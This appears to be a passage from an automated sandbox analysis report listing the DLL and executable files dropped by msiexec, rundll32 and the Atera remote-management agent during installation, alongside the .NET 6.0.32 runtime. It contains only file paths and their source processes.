                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.DiaSymReader.Native.amd64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI28DE.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDDD3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6A60.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID8C1.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 4c9998.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Requests.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\browser\lib\net6.0\System.Text.Encodings.Web.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI66C4.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA259.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebProxy.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1CA.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6E49.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\msquic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
